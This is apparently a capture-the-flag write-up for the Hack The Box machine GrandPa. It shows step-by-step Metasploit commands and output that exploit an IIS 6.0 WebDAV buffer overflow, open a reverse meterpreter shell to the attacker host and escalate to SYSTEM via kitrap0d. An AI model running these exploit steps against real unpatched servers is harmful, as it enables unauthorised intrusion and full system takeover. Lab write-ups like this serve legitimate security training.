GrandPa is a windows machine rated easy. The machine is running a vulnerable version of IIS which we are able to exploit and gain access, however, the user we have is not a system user. We end up having to migrate to another user, exploit yet another vulnerability to escalate privileges into system. As system, our quest for the flags is over.
Table of Contents
- Reconnaissance
- Enumeration
- Exploit using Metasploit
- Post Exploitation
- Privilege Escalation
- Defender’s Note
Reconnaissance
Let’s start by running an map scan to verify the running services.
$ nmap -A -T4 -p- 10.10.10.14We get the following results indicating that HTTP is the only open port. We also see that the machine is running Microsoft IIS httpd 6.0 and allows for Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL. We also see that it is running WebDAV.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| Server Date: Tue, 29 Jun 2021 20:18:13 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsEnumeration
Let’s first verify the webpage by navigating to it via the browser. We get the following webpage.
A quick check for the page source reveals nothing in particular.
When we do a quick google search, we see that there is a buffer overflow vulnerability in exploit DB. We also see that a metasploit module exists for the same.
We can confirm the same using searchsploit.
$ searchsploit ScStoragePathFromUrl
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | windows/remote/41992.rb
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results Exploit using Metasploit
Let’s start metasploit and search for the module.
$ msfconsole
msf6 > search ScStoragePathFromUrl
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl OverflowWe can verify the options that we need to set for the module.
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86When we set the required options and run the module, we successfully get a meterpreter session.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.24
lhost => 10.10.14.24
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.14:1031) at 2021-06-29 22:03:47 +0100
meterpreter > Post Exploitation
A quick check on who we are logged in as fails.
meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.Since we are not getting a user, we can try and migrate to a different user. Let’s check the services running and pick a service that is running under a user context.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
584 396 svchost.exe
672 396 svchost.exe
728 396 svchost.exe
744 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
756 396 svchost.exe
792 396 svchost.exe
928 396 spoolsv.exe
956 396 msdtc.exe
976 1448 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
1068 396 cisvc.exe
1112 396 svchost.exe
1172 396 inetinfo.exe
1208 396 svchost.exe
1320 396 VGAuthService.exe
1400 396 vmtoolsd.exe
1448 396 svchost.exe
1588 396 svchost.exe
1700 396 alg.exe
1760 348 logon.scr
1824 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1856 976 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
1908 396 dllhost.exe
2296 584 wmiprvse.exe
3928 1068 cidaemon.exe
3972 1068 cidaemon.exe
3996 1068 cidaemon.exe
4048 1856 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
meterpreter > migrate 744
[*] Migrating from 1856 to 744...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICENow that we have a user, let’s drop into shell and see if there is anything interesting.
meterpreter > shell
Process 3200 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\WINDOWS
12/24/2017 08:27 PM <DIR> .
12/24/2017 08:27 PM <DIR> ..
06/29/2021 11:07 PM 0 0.log
04/12/2017 04:41 PM <DIR> ADAM
04/12/2017 04:41 PM <DIR> addins
04/12/2017 04:41 PM <DIR> ADFS
02/18/2007 03:00 PM 1,041,920 adfs.msp
04/12/2017 05:26 PM 834 AdfsOcm.log
//TRUNCATED
02/18/2007 03:00 PM 707 _default.pif
87 File(s) 8,925,261 bytes
40 Dir(s) 18,090,725,376 bytes freeWe don’t see a user directory under windows.
Privilege Escalation
Let’s exit the shell and background this session. We can now search for possible privilege escalation modules that we can use.
C:\>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit SuggesterThere is only one possibility in this case. Let’s use it, set options and run it.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) >
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > runWe get the below results. It looks like there are a couple of exploits that we can use.
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completedLet’s use the first one, set the options and run it.
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.24
lhost => 10.10.14.24
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lport 4445
lport => 4445
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.24:4445
[*] Launching notepad to host the exploit...
[+] Process 3256 launched.
[*] Reflectively injecting the exploit DLL into 3256...
[*] Injecting exploit into 3256 ...
[*] Exploit injected. Injecting payload into 3256...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.24:4445 -> 10.10.10.14:1032) at 2021-06-29 22:39:08 +0100Looks like we have a session. When we verify the user we are logged in as, we see that we have authority system meaning we have rooted the box. Let’s drop into the shell and get the flags.
meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1244 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.User Flag
To get the user flag, we need to locate the user’s desktop. We find a user called Harry and the user.txt is in his folder.
C:\Documents and Settings\Administrator\Desktop>cd ../..
cd ../..
C:\Documents and Settings>cd Harry
cd Harry
C:\Documents and Settings\Harry>cd Desktop
cd Desktop
C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Harry\Desktop
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,116,325,376 bytes free
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5XXXXXXXXXXXXXXXXXXXXa5d869Root Flag
The root flag is usually in the Administrator’s desktop.
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:12 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 05:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,090,659,840 bytes free
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator
04/12/2017 05:12 PM <DIR> .
04/12/2017 05:12 PM <DIR> ..
04/12/2017 05:28 PM <DIR> Desktop
04/12/2017 05:12 PM <DIR> Favorites
04/12/2017 05:12 PM <DIR> My Documents
04/12/2017 04:42 PM <DIR> Start Menu
04/12/2017 04:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 18,090,659,840 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 05:28 PM <DIR> .
04/12/2017 05:28 PM <DIR> ..
04/12/2017 05:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,090,655,744 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e9XXXXXXXXXXXXXXXXXXXXXX28bb7bDefender’s Note
- Patch systems in a timely manner. We were able to gain access and escalate privileges due to vulnerabilities that had not been patched.
CyberSecFaith 